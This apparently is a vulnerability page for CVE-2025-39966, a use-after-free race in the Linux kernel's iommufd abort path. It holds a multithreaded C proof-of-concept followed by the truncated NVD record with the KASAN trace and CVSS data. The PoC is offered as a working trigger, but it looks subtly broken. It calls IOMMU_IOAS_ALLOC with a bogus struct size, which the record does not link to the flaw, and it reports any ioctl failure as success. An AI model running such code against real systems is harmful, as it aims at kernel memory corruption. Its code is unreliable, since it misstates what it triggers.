CVE-2025-39966

// CVE-2025-39966 PoC - Trigger UAF via iommufd abort path race condition // This PoC demonstrates the race condition between fput() and kfree() // in the iommufd object allocation abort path. #include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <fcntl.h> #include <sys/ioctl.h> #include <sys/mman.h> #include <string.h> #include <errno.h> #include <pthread.h> #include <linux/iommufd.h> // iommufd ioctl definitions (from kernel headers) #ifndef IOMMUFD_IOCTL #define IOMMUFD_IOCTL _IO('I', 0x90) #endif static int open_iommufd(void) { int fd = open("/dev/iommu", O_RDWR); if (fd < 0) { perror("open /dev/iommu"); return -1; } return fd; } // Trigger the abort path by attempting to create an iommufd object // with invalid parameters, causing allocation to fail after file creation static int trigger_abort_race(int iommufd_fd) { struct iommu_ioas_alloc alloc_req = {0}; int ret; // Allocate with intentionally invalid size to trigger abort path alloc_req.size = 0xFFFFFFFFFFFFFFFFULL; // Invalid size alloc_req.flags = 0; ret = ioctl(iommufd_fd, IOMMU_IOAS_ALLOC, &alloc_req); if (ret < 0) { printf("[+] Abort path triggered (expected): %s\n", strerror(errno)); return 0; } return -1; } // Repeatedly trigger the race condition to increase probability // of hitting the UAF window between fput() async release and kfree() static void *race_worker(void *arg) { int *iommufd_fd = (int *)arg; for (int i = 0; i < 10000; i++) { trigger_abort_race(*iommufd_fd); usleep(1); } return NULL; } int main(int argc, char *argv[]) { int iommufd_fd; pthread_t threads[4]; printf("[*] CVE-2025-39966 - iommufd UAF via abort path race\n"); iommufd_fd = open_iommufd(); if (iommufd_fd < 0) { fprintf(stderr, "[-] Failed to open iommufd device\n"); return 1; } printf("[*] iommufd opened: fd=%d\n", iommufd_fd); printf("[*] Starting race condition workers...\n"); // Spawn multiple threads to increase race window probability for (int i = 0; i < 4; i++) { pthread_create(&threads[i], NULL, race_worker, &iommufd_fd); } for (int i = 0; i < 4; i++) { pthread_join(threads[i], NULL); } printf("[*] Race condition triggered. Check dmesg for UAF detection.\n"); close(iommufd_fd); return 0; } // Compile: gcc -o poc poc.c -lpthread // Run with KASAN-enabled kernel to observe: // BUG: KASAN: slab-use-after-free in iommufd_eventq_fops_release

{"cve": {"id": "CVE-2025-39966", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2025-10-15T08:15:34.043", "lastModified": "2026-02-26T23:07:45.443", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\niommufd: Fix race during abort for file descriptors\n\nfput() doesn't actually call file_operations release() synchronously, it\nputs the file on a work queue and it will be released eventually.\n\nThis is normally fine, except for iommufd the file and the iommufd_object\nare tied to gether. The file has the object as it's private_data and holds\na users refcount, while the object is expected to remain alive as long as\nthe file is.\n\nWhen the allocation of a new object aborts before installing the file it\nwill fput() the file and then go on to immediately kfree() the obj. This\ncauses a UAF once the workqueue completes the fput() and tries to\ndecrement the users refcount.\n\nFix this by putting the core code in charge of the file lifetime, and call\n__fput_sync() during abort to ensure that release() is called before\nkfree. __fput_sync() is a bit too tricky to open code in all the object\nimplementations. Instead the objects tell the core code where the file\npointer is and the core will take care of the life cycle.\n\nIf the object is successfully allocated then the file will hold a users\nrefcount and the iommufd_object cannot be destroyed.\n\nIt is worth noting that close(); ioctl(IOMMU_DESTROY); doesn't have an\nissue because close() is already using a synchronous version of fput().\n\nThe UAF looks like this:\n\n BUG: KASAN: slab-use-after-free in iommufd_eventq_fops_release+0x45/0xc0 drivers/iommu/iommufd/eventq.c:376\n Write of size 4 at addr ffff888059c97804 by task syz.0.46/6164\n\n CPU: 0 UID: 0 PID: 6164 Comm: syz.0.46 Not tainted syzkaller #0 PREEMPT(full)\n Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 08/18/2025\n Call Trace:\n <TASK>\n __dump_stack lib/dump_stack.c:94 [inline]\n dump_stack_lvl+0x116/0x1f0 lib/dump_stack.c:120\n print_address_description mm/kasan/report.c:378 [inline]\n print_report+0xcd/0x630 mm/kasan/report.c:482\n kasan_report+0xe0/0x110 mm/kasan/report.c:595\n check_region_inline mm/kasan/generic.c:183 [inline]\n kasan_check_range+0x100/0x1b0 mm/kasan/generic.c:189\n instrument_atomic_read_write include/linux/instrumented.h:96 [inline]\n atomic_fetch_sub_release include/linux/atomic/atomic-instrumented.h:400 [inline]\n __refcount_dec include/linux/refcount.h:455 [inline]\n refcount_dec include/linux/refcount.h:476 [inline]\n iommufd_eventq_fops_release+0x45/0xc0 drivers/iommu/iommufd/eventq.c:376\n __fput+0x402/0xb70 fs/file_table.c:468\n task_work_run+0x14d/0x240 kernel/task_work.c:227\n resume_user_mode_work include/linux/resume_user_mode.h:50 [inline]\n exit_to_user_mode_loop+0xeb/0x110 kernel/entry/common.c:43\n exit_to_user_mode_prepare include/linux/irq-entry-common.h:225 [inline]\n syscall_exit_to_user_mode_work include/linux/entry-common.h:175 [inline]\n syscall_exit_to_user_mode include/linux/entry-common.h:210 [inline]\n do_syscall_64+0x41c/0x4c0 arch/x86/entry/syscall_64.c:100\n entry_SYSCALL_64_after_hwframe+0x77/0x7f"}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.0, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.0, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-362"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.11", "versionEndExcluding": "6.12.50", "matchCriteriaId": "7C1BAD98-3D2E-4A2F-ABC0-2E79F9AE0CC9"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.13", "versionEndExcluding": "6.16.10", "matchCriteriaId": "8AE7824F-9555-4B3E-B0F8-C9E279E8B81A"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.17:rc1:*:*:*:*:*:*", "matchCriteriaId": "327D22EF-390B-454C-BD31-2ED23C998A1C"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.17:rc2:*:*:*:*:*:*", "matchCriteriaId": "C730CD9A-D969-4A8E-9522-162AAF7C0EE9"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.17:rc3:*:*:*:*:*:*", "matchCriteriaId": "39982C4B-716E-4B2F-8196-FA301F47807D"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.17:rc4:* ... (truncated)